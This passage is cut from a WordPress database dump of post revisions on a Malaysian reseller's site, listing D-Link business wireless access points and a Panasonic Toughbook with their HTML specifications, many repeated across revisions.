Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:46:04','2018-12-21 01:46:04','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2633,1,'2018-12-20 12:52:58','2018-12-20 04:52:58','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point</h4>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Point</h4>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Point</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>N300 Wireless PoE Access Point</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 12:52:58','2018-12-20 04:52:58','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2637,1,'2018-12-20 14:23:37','2018-12-20 06:23:37','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:23:37','2018-12-20 06:23:37','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2635,1,'2018-12-20 13:03:18','2018-12-20 05:03:18','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>N300 Wireless PoE Access Point</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 13:03:18','2018-12-20 05:03:18','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2638,1,'2018-12-20 14:24:19','2018-12-20 06:24:19','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:24:19','2018-12-20 06:24:19','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2639,1,'2018-12-20 14:24:55','2018-12-20 06:24:55','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" 